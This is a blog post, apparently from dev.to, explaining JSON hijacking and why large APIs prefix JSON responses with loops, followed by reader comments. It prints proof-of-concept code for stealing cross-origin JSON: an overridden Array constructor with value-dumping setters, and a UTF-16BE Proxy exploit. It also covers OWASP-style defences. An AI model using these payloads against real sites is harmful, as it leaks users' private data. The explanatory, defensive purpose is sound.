Why Facebook's api starts with a for loop
Antony Garand Nov 13 Updated on Nov 15, 2018
If you ever inspected your requests to big company's API's in the browser, you might have noticed some weird javascript before the JSON itself:
Why would they waste few bytes to invalidate this JSON?
To protect your data
Without those important bytes, it could be possible for any website to access this data.
This vulnerability is called JSON hijacking, and allows websites to extract the JSON data from those API's.
Origins
In JavaScript 1.5 and earlier versions, it was possible to override Primitive Object's constructor, and have this overridden version called when using bracket notations.
This means you could do:
function Array(){
alert('You created an array!');
}
var x = [1,2,3];
And the alert would popup!
Replace the var x
with the following script, and the attacker could read your emails!
This works by overwriting the Array
constructor before loading an external script.
<script src="https://gmail.com/messages"></script>
Data extraction
Even though you're overriding the constructor, the array is still constructed and you can still access it via this
.
Here is a snippet which will alert all of the array data:
function Array() {
var that = this;
var index = 0;
// Populating the array with setters, which dump the value when called
var valueExtractor = function(value) {
// Alert the value
alert(value);
// Set the next index to use this method as well
that.__defineSetter__(index.toString(),valueExtractor );
index++;
};
// Set the setter for item 0
that.__defineSetter__(index.toString(),valueExtractor );
index++;
}
Upon creating arrays, their values will be alerted!
This was fixed in the ECMAScript 4 proposal, as we now can no longer override the prototype of most primitives, such as Object
and Array
.
Even though ES4 was never released, this vulnerability was fixed by major browsers soon after its discovery.
You can still have similar behavior in today's javascript, but it is limited to variables you create, or item creations not using the bracket notation.
This would be the adapted version of the previous payload:
// Making an array
const x = [];
// Making the overriden methods
x.copy = [];
const extractor = (v) => {
// Keeping the value in a different array
x.copy.push(v);
// Setting the extractor for the next value
const currentIndex = x.copy.length;
x.__defineSetter__(currentIndex, extractor);
x.__defineGetter__(currentIndex, ()=>x.copy[currentIndex]);
// Logging the value
console.log('Extracted value', v);
};
// Assigning the setter on index 0
x.__defineSetter__(0, extractor);
x.__defineGetter__(0, ()=>x.copy[0]);
// Using the array as usual
x[0] = 'zero';
x[1] = 'one';
console.log(x[0]);
console.log(x[1]);
And this would be a version using the Array
keyword to create your array:
function Array(){
console.log(arguments);
}
Array("secret","values");
As you can see, the data you added to the array was logged, while the functionality remains the same!
The fix itself was not to block the function Array
creation in itself, but to force the bracket notation of item creations to use the native implementation, and not your custom function.
This means we can still create an Array
function, but it won't be used with square brackets ([1,2,3]
).
It still will be called if we use the x = new Array(1,2,3)
or x = Array(1,2,3)
notation though, but this doesn't help us with JSON hijacking.
Modern variations
Alright, so we know old versions of browsers were vulnerable a while ago.
What does this mean for us today?
Well, with the recent release of EcmaScript 6, new juicy features were added such as Proxies!
Gareth Heyes from Portswigger blogged out out a modern variation of this attack, which still lets us steal data from JSON endpoints!
Using Proxies instead of Accessors lets us steal any variable created, no matter what its name is.
It can behave like an accessor but for any accessed or written property.
Using this and another quirk, it is possible to steal data once again!
UTF-16BE is a multi-byte charset and so two bytes will actually form one character. If for example your script starts with [" this will be treated as the character 0x5b22 not 0x5b 0x22. 0x5b22 happens to be a valid JavaScript variable =). Can you see where this is going?
Using such a script:
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
With a bit of controlled data from this script, as well as the practical bit-shifting script to make this legible again, we can exfiltrate data once again!
Here is his final edge POC, taken from his blog post:
<!doctype HTML>
<script>
Object.setPrototypeOf(__proto__,new Proxy(__proto__,{
has:function(target,name){
alert(name.replace(/./g,function(c){ c=c.charCodeAt(0);return String.fromCharCode(c>>8,c&0xff); }));
}
}));
</script>
<script charset="UTF-16BE" src="external-script-with-array-literal"></script>
<!-- script contains the following response: ["supersecret","<?php echo chr(0)?>aa"] -->
As I won't explain his method in depth, I strongly suggest you to read his post for more informations.
Prevention
Here are the official OWASP recommendations, taken from their AJAX security cheat sheet
Use CSRF Protection
This prevents the exploit by not returning the data if a security header or csrf token is not present.Always return JSON with an Object on the outside
This last solution is interesting.
In Firefox and IE, for some reason, this is valid:
x = [{"key":"value"}]
x = {"key":"value"}
[{"key":"value"}]
{key: "value"}
But this isn't:
{"key":"value"}
The reason why it is not valid is that Firefox and IE considers the brackets to be the start of a block statement, and not an object creation.
The notation without quotes, {key: "value"}
, is considered a label, with the value being a statement.
Chrome, unlike the others, considers those cases to be an object creation, and therefore it creates a new object.
Thanks Matt (r0x33d) for the help demystifying this!
Matt@r0x33d@jon_bottarini @AntoGarand @MarcS0h As for {key:'value'} - this is processed as Labelled Block Statement. You can confirm that by writing {key:'value', keytwo:'value2'} into console, this won't work.06:15 AM - 13 Nov 2018
Conclusion
While those vectors may not be working today, we never know what new bug tomorrow will bring, and therefore we should still do our best to prevent API's from being exploitable.
If we took this StackOverflow answer answer for granted, we would have been vulnerable to the modern variants, and therefore still possibly hacked.
Google and Facebook's answer has been to add invalid javascript or infinite loops before their JSON data, but there are few other alternatives as listed by OWASP.
References:
Haacked.com - JSON Highjacking
Stackoverflow - Why does google prepend [a loop] to their JSON responses
Portswigger - JSON highjacking for the modern web
And the slides of Gareth Heyes
This is incredibly illuminating. Thank you so much for this Antony!
Replace
var x
with an html script tag?But how?
In your webpage, you would do the following:
This way you overload the constructor before loading the messages themselves.
Ah ok, I see.
I think the way it is written in the article is confusing. It should instead say "override the Array constructor before loading external scripts"
Thanks for the feedback, updated the post so it's more clear
Wow you're fast!
If you are going to put links on your article please drop the condescending lmddgtfy.com idiocy...that's just lackadaisical and boorish to readers. The point of an article's links are to support the content it talks about, not insult readers by demonstrating a lack of effort on your part. I would expect this behavior when someone asks a simple question on a chat forum or the YouTube comments area but a dev.to article, REALLY?
So, after writing up a full article, including a reference section and links through the post, having a link towards a search result page is a
lack of effort on my part
and aninsult to the readers
?That's my writing style and if you don't like it, you're free to not read it or not click on the links, specially since there should be a link preview on the bottom left corner of your browser.
Finally, considering this article has over 65k views and you're the only negative comment, I would consider you to be the exception.
Hope you enjoyed the article, but please provide your comments in a more constructive manner next time I include a lmddgtfy.net link!
I'm sorry if you consider my comment "negative" that was not the intention, it was a trivial request. The lmddgtfy link just came off really condescending to me so I over reacted, apologies for that. I instantly close any links that go to let me search that for you sites as the lmgtfy.com website has a nice little "That wasn't so hard was it?" message right before it clicks search. After being insulted by this many times I had assumed that the duck duck go version did the same thing and closed the page before it even clicked search.
"please provide your comments in a more constructive manner next time I include a lmddgtfy.net link!"
Ok, instead of providing a lmddgtfy link with a lengthy 5 second animation suggesting that the reader lacks the brain power to search themselves. Just do a direct link to the search result like so duckduckgo.com/?q=JSON+hijacking, it's faster and more direct.
Although if someone is interested in the topic they will search for it themselves, it seems a little redundant to open a search result for an article. Try linking in other interesting reads related to the topic, maybe even some dev.to ones. Hope that's constructive enough for you. :)
I did love the article though!
I'm really wondering how any of these attack techniques would fare against simpler CSRF techniques like double-submitted cookies.
Other stupid ways that seem like they could mitigate this would be to just make all the JSON endpoints require a POST, or to use a different method of encoding data that can't be interpreted as valid Javascript at all (XML?)
Making them all POST wouldn't be semantic (POST means you're changing something on the server). JSON is the standard API data format now, and it's much better than XML in my opinion.
The ultimate way to prevent these attacks is to not allow user submitted input to end up anywhere in output unescaped so attackers' scripts are never able to be injected.
I can see how adding an infinite for-loop at the start of the JSON response would prevent it from being executed as JavaScript. How does the original site access the data? Does it need to use a function to discard the first X bytes of every response before loading the JSON? Or is there something I'm missing?
This is exactly it!
As they load the string version of the JSON, they can remove their JS breaking mechanism before parsing it
If you have some js on your site, that can modify your constructor, you already hijacked, isn't it?
This attack is used to steal data from another website.
Say you're on dev.to, you don't want dev.to to access your emails!
But dev.to can still execute their own scripts, which makes sense.
Pardon my noob but shouldn't it be fixed with CORS instead?
Cors wouldn't work on old browsers, and CORS is also used on the source site to limit what can be accessed from this website.
What is happening here is the opposite: An attacking website want to access information from another one.
Also note that this vulnerability is over 10 years old, well older than CORS :)
I did something similar, but I used
location.href=...
to redirect to the site from which the data was supposed to be used.nice piece and good use of the notation to illuminate the point.
Look forward to seeing more from you!
Amazing, I knew some of those individually however this extremely helpful post is like a complete paper with references, so I can bookmark this, thank you Antony!
Great post! Very insightful
Great article. Small typo. Agaim!
Thanks, just fixed it!
So just use Protocol Buffers in your API response.
Awesome post Antony! I always wondered about the for loop.